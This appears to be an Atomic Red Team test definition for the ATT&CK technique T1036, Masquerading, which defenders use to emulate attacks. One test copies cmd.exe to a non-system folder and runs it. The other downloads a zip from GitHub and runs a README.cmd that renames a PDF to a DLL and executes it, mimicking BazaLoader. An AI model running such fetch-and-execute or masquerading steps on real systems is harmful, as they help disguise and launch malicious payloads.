attack_technique: T1036 display_name: "Masquerading" atomic_tests: - name: System File Copied to Unusual Location auto_generated_guid: 51005ac7-52e2-45e0-bdab-d17c6d4916cd description: It may be suspicious seeing a file copy of an EXE in System32 or SysWOW64 to a non-system directory or executing from a non-system directory. supported_platforms: - windows executor: command: |- copy-item "$env:windir\System32\cmd.exe" -destination "$env:allusersprofile\cmd.exe" start-process "$env:allusersprofile\cmd.exe" sleep -s 5 stop-process -name "cmd" | out-null cleanup_command: remove-item "$env:allusersprofile\cmd.exe" -force -erroraction silentlycontinue name: powershell - name: Malware Masquerading and Execution from Zip File auto_generated_guid: 4449c89b-ec82-43a4-89c1-91e2f1abeecc description: When the file is unzipped and the README.cmd file opened, it executes and changes the .pdf to .dll and executes the dll. This is a BazaLoader technique [as reported here](https://twitter.com/ffforward/status/1481672378639912960) supported_platforms: - windows input_arguments: url: description: Location of zip file type: url default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036/bin/T1036.zip dependencies: - description: Zip file must be present. prereq_command: | if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\T1036.zip") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null Invoke-WebRequest #{url} -OutFile "PathToAtomicsFolder\..\ExternalPayloads\T1036.zip" executor: command: |- Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\T1036.zip" -DestinationPath "$env:userprofile\Downloads\T1036" -Force cd "$env:userprofile\Downloads\T1036" cmd /c "$env:userprofile\Downloads\T1036\README.cmd" >$null 2>$null cleanup_command: |- taskkill /IM Calculator.exe /f >$null 2>$null Remove-Item "$env:userprofile\Downloads\T1036" -recurse -ErrorAction Ignore name: powershell